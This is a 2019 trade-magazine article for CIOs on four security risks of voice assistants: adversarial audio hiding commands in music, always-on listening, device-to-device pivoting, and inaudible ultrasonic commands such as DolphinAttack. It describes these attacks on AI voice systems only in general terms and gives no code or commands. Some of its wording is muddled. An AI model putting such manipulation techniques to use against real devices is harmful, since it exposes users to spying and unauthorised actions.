enterprisesecuritymag

4 Security Threats of Voice Assistants That CIOs Need to Worry About

By Enterprise Security Magazine | Friday, September 27, 2019

Doubtlessly, voice assistants have made the lifestyle much easier by providing the convenience of hands-free control. However, many concerns are coming into picture regarding the threats posed by these digital assistants.

FREMONT, CA: Voice assistants are digitally active assistants that make use of voice recognition, human language processing, and speech synthesis to support the users through mobile devices, and voice recognition applications.

Voice assistants usually support the users in tasks like playing music, making reservations, listening to an audiobook, and many more. 

Artificial Intelligence (AI), voice recognition, and machine learning technology form the foundation of voice assistants. As soon as the end-user interacts with the voice assistant, the AI programming makes use of intricate algorithms to acquire knowledge from data input and improve itself at understanding and predicting the end user's requirements. 

However, these days, users typically using voice assistants are facing security issues. Following are four ways in which voice assistants can be misused for attacking.

1. Hidden commands in the audio

There is a class of AI systems among malicious attacks against machine-learning that try to change an input like an audio clip for voice systems and a picture for vision systems so that the machines identify if there is some difference or change.

Carlini, a research scientist at UC Berkeley, used this technique in his research by altering an audio clip that converts it to a similar clip that transliterates into an entirely different phase. This technique is capable of hiding commands inside the music.

2. It is still active

Voice assistants are still working even if you are not giving any commands. Just like mobile devices, voice assistants are embedded with sensors that possess a lot of user's details. The devices on listening to the commands send it to the clouds, making it a kind of bug at the user's location by design. Hence, the privacy of the user is exposed inadvertently and become vulnerable to malicious attacks.

 3. Shifting from one device to another

Generally, fraudsters easily find ways into companies and home through the router or an unsecured wireless network. Voice assistants have benefitted them by enabling to bridge attacks by utilizing an audio device to give commands to the devices. The dollhouse incident can be taken as an inadvertent version of this attack.

4. Machines can hear that users can't

Masking the commands inside some other audio is not the only solution for creating a covert way for manipulating voice assistants. Six researchers from Zhejiang University in 2017, demonstrated that a sound inaudible to human for commanding Siri could be used to make calls or perform other actions. 

The famous DolphinAttack shows the consequences of lack of security where a voice assistant can be commanded to visit a malicious site, inject fake injection, spy on the users, and other such things.

No wonder, it is beneficial to install virtual systems in homes or offices. However, it comes with some severe consequences that will need to be taken care of.

Weekly Brief